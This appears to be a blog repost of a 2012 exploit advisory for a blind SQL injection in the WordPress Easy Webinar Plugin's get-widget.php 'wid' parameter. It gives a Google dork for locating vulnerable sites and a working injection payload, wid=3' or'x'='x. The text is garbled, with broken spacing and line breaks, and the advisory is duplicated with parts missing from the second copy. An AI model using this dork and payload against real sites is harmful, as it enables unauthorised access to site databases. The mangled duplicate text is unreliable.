#ExploitTitle:Wordpress Easy
Webinar Plugin Blind SQL Injection
Vulnerability
#VendorHomepage:
www .easywebinarplugin.com
#Date:10/26/2012
#Author:RobertCooper(robert.cooper
[at]areyousecure.net)
#Testedon:[Linux/Windows7]
#Vulnerable Parameters:wid=
Code:
#GoogleDork:allinurl:get-
widget .php?wid=
##############################################################
Exploit:
www.example.com/wp-content /plugins/
webinar_plugin/get-widget.php?wid=
[SQLi]
Note:The HTTP response will read 404,
but this isfalse :
www.example.com/wp-content/plugins/
webinar_plugin/get-widget.php?wid=3'
or'x'='x
This wil lresult in the page loading
correctly and show that the pluginis
vulnerable to injection (string).
##############################################################
Webinar Plugin Blind SQL Injection
Vulnerability
#VendorHomepage:
#Date:10/26/2012
#Author:RobertCooper(robert.
[at]areyousecure.net)
#Testedon:[Linux/Windows7]
#Vulnerable Parameters:wid=
Code:
#GoogleDork:allinurl:get-
##############################################################
Exploit:
www.example.com/wp-
webinar_plugin/get-widget.php?wid=
[SQLi]
Note:The HTTP response will read 404,
but this is
www.example.com/wp-content/plugins/
webinar_plugin/get-widget.php?wid=3'
or'x'='x
This wil lresult in the page loading
correctly and show that the pluginis
vulnerable to injection (string).
##############################################################
No comments:
Post a Comment